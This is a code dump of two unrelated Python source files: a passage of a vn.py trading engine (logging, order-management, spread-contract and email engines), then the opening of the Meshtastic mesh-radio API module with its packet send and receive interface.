for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
if app.app_name == "RiskManager":
self.rm_engine = engine
elif app.app_name == "AlgoTrading":
self.algo_engine = engine
elif app.app_name == 'RpcService':
self.rpc_service = engine
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self) -> List[str]:
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_gateway_status(self) -> List[dict]:
"""
Get all gateway status
:return:
"""
return list([{k: v.get_status()} for k, v in self.gateways.items()])
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
如果没有指定gateway,那么所有的gateway都会接收改订阅请求
"""
if gateway_name:
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
else:
for gateway in self.gateways.values():
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
扩展支持自定义套利合约。 由cta_strategy_pro发出算法单委托,由算法引擎进行处理
"""
# 自定义套利合约,交给算法引擎处理
if self.algo_engine and req.exchange == Exchange.SPD:
return self.algo_engine.send_spd_order(
req=req,
gateway_name=gateway_name)
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> bool:
"""
Send cancel order request to a specific gateway.
"""
# 自定义套利合约,交给算法引擎处理
if self.algo_engine and req.exchange == Exchange.SPD:
return self.algo_engine.cancel_spd_order(
req=req)
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.cancel_order(req)
return False
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
批量发单
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
self.write_log(f'网关为空,请检查合约得网关是否与连接得网关一致')
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
if hasattr(self, 'save_contracts'):
self.save_contracts()
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
self.logger = None
self.create_logger(engine_name)
def create_logger(self, logger_name: str = 'base_engine'):
"""
创建engine独有的日志
:param logger_name: 日志名,缺省为engine的名称
:return:
"""
log_path = get_folder_path("log")
log_filename = str(log_path.joinpath(logger_name))
print(u'create logger:{}'.format(log_filename))
self.logger = setup_logger(file_name=log_filename, name=logger_name,
log_level=SETTINGS.get('log.level', logging.DEBUG))
def write_log(self, msg: str, source: str = "", level: int = logging.DEBUG):
"""
写入日志
:param msg: 日志内容
:param source: 来源
:param level: 日志级别
:return:
"""
if self.logger:
if len(source) > 0:
msg = f'[{source}]{msg}'
self.logger.log(level, msg)
else:
log = LogData(msg=msg, level=level, gateway_name='')
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.today_contracts: Dict[str, ContractData] = {}
# 自定义合约
self.custom_contracts = {} # vt_symbol: ContractData
self.custom_settings = {} # symbol: dict
self.symbol_spd_maping = {} # symbol: [spd_symbol]
self.prices = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
self.load_contracts()
def __del__(self):
"""保存缓存"""
self.save_contracts()
def load_contracts(self) -> None:
"""从本地缓存加载合约字典"""
import bz2
import pickle
contract_file_name = 'vn_contract.pkb2'
if os.path.exists(contract_file_name):
try:
with bz2.BZ2File(contract_file_name, 'rb') as f:
self.contracts = pickle.load(f)
self.write_log(f'加载缓存合约字典:{contract_file_name}')
except Exception as ex:
self.write_log(f'加载缓存合约异常:{str(ex)}')
# 更新自定义合约
custom_contracts = self.get_all_custom_contracts()
self.get_all_custom_contracts(rtn_setting=True)
for contract in custom_contracts.values():
# 更新合约缓存
self.contracts.update({contract.symbol: contract})
self.contracts.update({contract.vt_symbol: contract})
self.today_contracts[contract.vt_symbol] = contract
self.today_contracts[contract.symbol] = contract
# 获取自定义合约的主动腿/被动腿
setting = self.custom_settings.get(contract.symbol, {})
leg1_symbol = setting.get('leg1_symbol')
leg2_symbol = setting.get('leg2_symbol')
# 构建映射关系
for symbol in [leg1_symbol, leg2_symbol]:
spd_mapping_list = self.symbol_spd_maping.get(symbol, [])
# 更新映射 symbol => spd_symbol
if (not contract.symbol.endswith('.SPD')) and contract.symbol not in spd_mapping_list:
spd_mapping_list.append(contract.symbol)
self.symbol_spd_maping.update({symbol: spd_mapping_list})
def save_contracts(self) -> None:
"""持久化合约对象到缓存文件"""
import bz2
import pickle
contract_file_name = 'vn_contract.pkb2'
with bz2.BZ2File(contract_file_name, 'wb') as f:
if len(self.today_contracts) > 0:
self.write_log(f'保存今日合约对象到缓存文件')
pickle.dump(self.today_contracts, f)
else:
pickle.dump(self.contracts, f)
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_price = self.get_price
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_exchange = self.get_exchange
self.main_engine.get_custom_contract = self.get_custom_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
self.main_engine.get_all_custom_contracts = self.get_all_custom_contracts
self.main_engine.get_mapping_spd = self.get_mapping_spd
self.main_engine.save_contracts = self.save_contracts
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
if '&' not in tick.symbol and tick.last_price:
self.prices[tick.vt_symbol] = tick.last_price
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
if position.exchange != Exchange.SPD:
self.create_spd_position_event(position.symbol, position.direction)
def reverse_direction(self, direction):
"""返回反向持仓"""
if direction == Direction.LONG:
return Direction.SHORT
elif direction == Direction.SHORT:
return Direction.LONG
return direction
def create_spd_position_event(self, symbol, direction):
"""创建自定义品种对持仓信息"""
spd_symbols = self.symbol_spd_maping.get(symbol, [])
if not spd_symbols:
return
for spd_symbol in spd_symbols:
spd_setting = self.custom_settings.get(spd_symbol, None)
if not spd_setting:
continue
leg1_symbol = spd_setting.get('leg1_symbol')
leg2_symbol = spd_setting.get('leg2_symbol')
leg1_contract = self.contracts.get(leg1_symbol)
leg2_contract = self.contracts.get(leg2_symbol)
spd_contract = self.contracts.get(spd_symbol)
if leg1_contract is None or leg2_contract is None:
continue
leg1_ratio = spd_setting.get('leg1_ratio', 1)
leg2_ratio = spd_setting.get('leg2_ratio', 1)
# 找出leg1,leg2的持仓,并判断出spd的方向
spd_pos = None
if leg1_symbol == symbol:
k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{direction.value}"
leg1_pos = self.positions.get(k1)
k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{self.reverse_direction(direction).value}"
leg2_pos = self.positions.get(k2)
spd_direction = direction
k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
spd_pos = self.positions.get(k3)
elif leg2_symbol == symbol:
k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{self.reverse_direction(direction).value}"
leg1_pos = self.positions.get(k1)
k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{direction.value}"
leg2_pos = self.positions.get(k2)
spd_direction = self.reverse_direction(direction)
k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
spd_pos = self.positions.get(k3)
else:
continue
if leg1_pos is None or leg2_pos is None: # or leg1_pos.volume ==0 or leg2_pos.volume == 0:
continue
# 根据leg1/leg2的volume ratio,计算出最小spd_volume
spd_volume = min(int(leg1_pos.volume / leg1_ratio), int(leg2_pos.volume / leg2_ratio))
if spd_volume <= 0 and spd_pos is None:
continue
if spd_setting.get('is_ratio', False) and leg2_pos.price > 0:
spd_price = 100 * (leg2_pos.price * leg1_ratio) / (leg2_pos.price * leg2_ratio)
elif spd_setting.get('is_spread', False):
spd_price = leg1_pos.price * leg1_ratio - leg2_pos.price * leg2_ratio
else:
spd_price = 0
spd_pos = PositionData(
gateway_name=spd_contract.gateway_name,
accountid=leg1_pos.accountid,
symbol=spd_symbol,
exchange=Exchange.SPD,
direction=spd_direction,
volume=spd_volume,
price=spd_price
)
event = Event(EVENT_POSITION, data=spd_pos)
self.event_engine.put(event)
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
self.contracts[contract.symbol] = contract
self.today_contracts[contract.vt_symbol] = contract
self.today_contracts[contract.symbol] = contract
def get_exchange(self, symbol: str) -> Exchange:
"""获取合约对应的交易所"""
contract = self.contracts.get(symbol, None)
if contract is None:
return Exchange.LOCAL
return contract.exchange
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_price(self, vt_symbol):
"""
get the lastest price by vt_symbol
:param vt_symbol:
:return:
"""
return self.prices.get(vt_symbol, None)
def get_order(self, vt_orderid) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
def get_custom_contract(self, symbol):
"""
获取自定义合约的设置
:param symbol: "pb2012-1-pb2101-1-CJ"
:return: {
"name": "pb跨期价差",
"exchange": "SPD",
"leg1_symbol": "pb2012",
"leg1_exchange": "SHFE",
"leg1_ratio": 1,
"leg2_symbol": "pb2101",
"leg2_exchange": "SHFE",
"leg2_ratio": 1,
"is_spread": true,
"size": 1,
"margin_rate": 0.1,
"price_tick": 5
}
"""
return self.custom_settings.get(symbol, None)
def get_all_custom_contracts(self, rtn_setting=False):
"""
获取所有自定义合约
:return:
"""
if rtn_setting:
if len(self.custom_settings) == 0:
c = CustomContract()
self.custom_settings = c.get_config()
return self.custom_settings
if len(self.custom_contracts) == 0:
c = CustomContract()
self.custom_settings = c.get_config()
self.custom_contracts = c.get_contracts()
return self.custom_contracts
def get_mapping_spd(self, symbol):
"""根据主动腿/被动腿symbol,获取自定义套利对的symbol list"""
return self.symbol_spd_maping.get(symbol, [])
class CustomContract(object):
"""
定制合约
# 适用于初始化系统时,补充到本地合约信息文件中 contracts.vt
# 适用于CTP网关,加载自定义的套利合约,做内部行情撮合
"""
# 运行本地目录下,定制合约的配置文件(dict)
file_name = 'custom_contracts.json'
def __init__(self):
"""构造函数"""
from vnpy.trader.utility import load_json
self.setting = load_json(self.file_name) # 所有设置
def get_config(self):
"""获取配置"""
return self.setting
def get_contracts(self):
"""获取所有合约信息"""
d = {}
from vnpy.trader.object import ContractData, Exchange
for symbol, setting in self.setting.items():
gateway_name = setting.get('gateway_name', None)
if gateway_name is None:
gateway_name = SETTINGS.get('gateway_name', '')
vn_exchange = Exchange(setting.get('exchange', 'SPD'))
contract = ContractData(
gateway_name=gateway_name,
symbol=symbol,
exchange=vn_exchange,
name=setting.get('name', symbol),
size=setting.get('size', 100),
product=None,
pricetick=setting.get('price_tick', 0.01),
margin_rate=setting.get('margin_rate', 0.1)
)
d[contract.vt_symbol] = contract
return d
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
__init__.py
|
"""
# an API for Meshtastic devices
Primary class: SerialInterface
Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)"
Source code on [github](https://github.com/meshtastic/Meshtastic-python)
properties of SerialInterface:
- radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to
the device.
- nodes - The database of received nodes. Includes always up-to-date location and username information for each
node in the mesh. This is a read-only datastructure.
- myNodeInfo - Contains read-only information about the local radio device (software version, hardware version, etc)
# Published PubSub topics
We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available
topics:
- meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB
- meshtastic.connection.lost - published once we've lost our link to the radio
- meshtastic.receive.position(packet) - delivers a received packet as a dictionary, if you only care about a particular
type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive".
- meshtastic.receive.user(packet)
- meshtastic.receive.data(packet)
- meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...)
We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for
that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet
you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with
sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for
unicode scripts they can be different.
# Example Usage
```
import meshtastic
from pubsub import pub
def onReceive(packet, interface): # called when a packet arrives
print(f"Received: {packet}")
def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio
# defaults to broadcast, specify a destination ID if you wish
interface.sendText("hello mesh")
pub.subscribe(onReceive, "meshtastic.receive")
pub.subscribe(onConnection, "meshtastic.connection.established")
# By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0
interface = meshtastic.SerialInterface()
```
"""
import socket
import pygatt
import google.protobuf.json_format
import serial
import threading
import logging
import time
import sys
import traceback
import time
import base64
import platform
from . import mesh_pb2
from . import util
from pubsub import pub
from dotmap import DotMap
START1 = 0x94
START2 = 0xc3
HEADER_LEN = 4
MAX_TO_FROM_RADIO_SIZE = 512
BROADCAST_ADDR = "^all" # A special ID that means broadcast
# if using 8 bit nodenums this will be shortend on the target
BROADCAST_NUM = 0xffffffff
MY_CONFIG_ID = 42
"""The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand"""
OUR_APP_VERSION = 172
class MeshInterface:
"""Interface class for meshtastic devices
Properties:
isConnected
nodes
debugOut
"""
def __init__(self, debugOut=None, noProto=False):
"""Constructor"""
self.debugOut = debugOut
self.nodes = None # FIXME
self.isConnected = False
if not noProto:
self._startConfig()
def sendText(self, text, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""Send a utf8 string to some other node, if the node has a display it will also be shown on the device.
Arguments:
text {string} -- The text to send
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
return self.sendData(text.encode("utf-8"), destinationId,
dataType=mesh_pb2.Data.CLEAR_TEXT, wantAck=wantAck, wantResponse=wantResponse)
def sendData(self, byteData, destinationId=BROADCAST_ADDR, dataType=mesh_pb2.Data.OPAQUE, wantAck=False, wantResponse=False):
"""Send a data packet to some other node
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
meshPacket = mesh_pb2.MeshPacket()
meshPacket.decoded.data.payload = byteData
meshPacket.decoded.data.typ = dataType
meshPacket.decoded.want_response = wantResponse
return self.sendPacket(meshPacket, destinationId, wantAck=wantAck)
def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""
Send a position packet to some other node (normally a broadcast)
Also, the device software will notice this packet and use it to automatically set its notion of
the local position.
If timeSec is not specified (recommended), we will use the local machine time.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
meshPacket = mesh_pb2.MeshPacket()
if(latitude != 0.0):
meshPacket.decoded.position.latitude_i = int(latitude / 1e-7)
if(longitude != 0.0):
meshPacket.decoded.position.longitude_i = int(longitude / 1e-7)
if(altitude != 0):
meshPacket.decoded.position.altitude = int(altitude)
if timeSec == 0:
timeSec = time.time() # returns unix timestamp in seconds
meshPacket.decoded.position.time = int(timeSec)
meshPacket.decoded.want_response = wantResponse
return self.sendPacket(meshPacket, destinationId, wantAck=wantAck)
def sendPacket(self, meshPacket, destinationId=BROADCAST_ADDR, wantAck=False):
"""Send a MeshPacket to the specified node (or if unspecified, broadcast).
You probably don't want this - use sendData instead.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
toRadio = mesh_pb2.ToRadio()
# FIXME add support for non broadcast addresses
if isinstance(destinationId, int):
nodeNum = destinationId
elif destinationId == BROADCAST_ADDR:
nodeNum = BROADCAST_NUM
else:
nodeNum = self.nodes[destinationId]['num']
meshPacket.to = nodeNum
meshPacket.want_ack = wantAck
# if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID
# so the message can be tracked.
if meshPacket.id == 0:
meshPacket.id = self._generatePacketId()
toRadio.packet.CopyFrom(meshPacket)
self._sendToRadio(toRadio)
return meshPacket
def writeConfig(self):
"""Write the current (edited) radioConfig to the device"""
if self.radioConfig == None:
raise Exception("No RadioConfig has been read")
t = mesh_pb2.ToRadio()
t.set_radio.CopyFrom(self.radioConfig)
self._sendToRadio(t)
@property
def channelURL(self):
"""The sharable URL that describes the current channel
"""
bytes = self.radioConfig.channel_settings.SerializeToString()
s = base64.urlsafe_b64encode(bytes).decode('ascii')
return f"https://www.meshtastic.org/c/#{s}"
def _generatePacketId(self):
"""Get a new unique packet ID"""
if self.currentPacketId is None:
raise Exception("Not connected yet, can not generate packet")
else:
self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff
return self.currentPacketId
def _disconnected(self):
"""Called by subclasses to tell clients this interface has disconnected"""
self.isConnected = False
pub.sendMessage("meshtastic.connection.lost", interface=self)
def _connected(self):
"""Called by this class to tell clients we are now fully connected to a node
"""
self.isConnected = True
pub.sendMessage("meshtastic.connection.established", interface=self)
def _startConfig(self):
"""Start device packets flowing"""
self.myInfo = None
self.nodes = {} # nodes keyed by ID
self._nodesByNum = {} # nodes keyed by nodenum
self.radioConfig = None
self.currentPacketId = None
startConfig = mesh_pb2.ToRadio()
startConfig.want_config_id = MY_CONFIG_ID # we don't use this value
self._sendToRadio(startConfig)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.error(f"Subclass must provide toradio: {toRadio}")
def _handleFromRadio(self, fromRadioBytes):
"""
Handle a packet that arrived from the radio(update model and publish events)
Called by subclasses."""
fromRadio = mesh_pb2.FromRadio()
fromRadio.ParseFromString(fromRadioBytes)
asDict = google.protobuf.json_format.MessageToDict(fromRadio)
logging.debug(f"Received: {asDict}")
if fromRadio.HasField("my_info"):
self.myInfo = fromRadio.my_info
if self.myInfo.min_app_version > OUR_APP_VERSION:
raise Exception(
"This device needs a newer python client, please \"pip install --upgrade meshtastic\"")
# start assigning our packet IDs from the opposite side of where our local device is assigning them
self.currentPacketId = (
self.myInfo.current_packet_id + 0x80000000) & 0xffffffff
elif fromRadio.HasField("radio"):
self.radioConfig = fromRadio.radio
elif fromRadio.HasField("node_info"):
node = asDict["nodeInfo"]
try:
self._fixupPosition(node["position"])
except:
logging.debug("Node without position")
self._nodesByNum[node["num"]] = node
if "user" in node: # Some nodes might not have user/ids assigned yet
self.nodes[node["user"]["id"]] = node
elif fromRadio.config_complete_id == MY_CONFIG_ID:
# we ignore the config_complete_id, it is unneeded for our stream API fromRadio.config_complete_id
self._connected()
elif fromRadio.HasField("packet"):
self._handlePacketFromRadio(fromRadio.packet)
elif fromRadio.rebooted:
# Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port
MeshInterface._disconnected(self)
self._startConfig() # redownload the node db etc...
else:
logging.debug("Unexpected FromRadio payload")
def _fixupPosition(self, position):
"""Convert integer lat/lon into floats
Arguments:
position {Position dictionary} -- object ot fix up
"""
if "latitudeI" in position:
position["latitude"] = position["latitudeI"] * 1e-7
if "longitudeI" in position:
position["longitude"] = position["longitudeI"] * 1e-7
def _nodeNumToId(self, num):
"""Map a node node number to a node ID
Arguments:
num {int} -- Node number
Returns:
string -- Node ID
"""
if num == BROADCAST_NUM:
return BROADCAST_ADDR
try:
return self._nodesByNum[num]["user"]["id"]
except:
logging.warn("Node not found for fromId")
return None
def _getOrCreateByNum(self, nodeNum):
"""Given a nodenum find the NodeInfo in the DB (or create if necessary)"""
if nodeNum == BROADCAST_NUM:
raise Exception("Can not create/find nodenum by the broadcast num")
if nodeNum in self._nodesByNum:
return self._nodesByNum[nodeNum]
else:
n = {"num": nodeNum} # Create a minimial node db entry
self._nodesByNum[nodeNum] = n
return n
def _handlePacketFromRadio(self, meshPacket):
"""Handle a MeshPacket that just arrived from the radio
Will publish one of the following events:
- meshtastic.receive.position(packet = MeshPacket dictionary)
- meshtastic.receive.user(packet = MeshPacket dictionary)
- meshtastic.receive.data(packet = MeshPacket dictionary)
"""
asDict = google.protobuf.json_format.MessageToDict(meshPacket)
# /add fromId and toId fields based on the node ID
asDict["fromId"] = self._nodeNumToId(asDict["from"])
asDict["toId"] = self._nodeNumToId(asDict["to"])
# We could provide our objects as DotMaps - which work with . notation or as dictionaries
# asObj = DotMap(asDict)
topic = "meshtastic.receive" # Generic unknown packet type
if meshPacket.decoded.HasField("position"):
topic = "meshtastic.receive.position"
p = asDict["decoded"]["position"]
self._fixupPosition(p)
# update node DB as needed
self._getOrCreateByNum(asDict["from"])["position"] = p
if meshPacket.decoded.HasField("user"):
topic = "meshtastic.receive.user"
u = asDict["decoded"]["user"]
# update node DB as needed
n = self._getOrCreateByNum(asDict["from"])
n["user"] = u
# We now have a node ID, make sure it is uptodate in that table
self.nodes[u["id"]] = u
if meshPacket.decoded.HasField("data"):
topic = "meshtastic.receive.data"
# OPAQUE is the default protobuf typ value, and therefore if not set it will not be populated at all
# to make API usage easier, set it to prevent confusion
if not "typ" in asDict["decoded"]["data"]:
asDict["decoded"]["data"]["typ"] = "OPAQUE"
# For text messages, we go ahead and decode the text to ascii for our users
if asDict["decoded"]["data"]["typ"] == "CLEAR_TEXT":
asDict["decoded"]["data"]["text"] = meshPacket.decoded.data.payload.decode(
"utf-8")
pub.sendMessage(topic, packet=asDict, interface=self)
# Our standard BLE characteristics
TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7"
FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5"
FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453"
class BLEInterface(MeshInterface):
"""A not quite ready - FIXME - BLE interface to devices"""
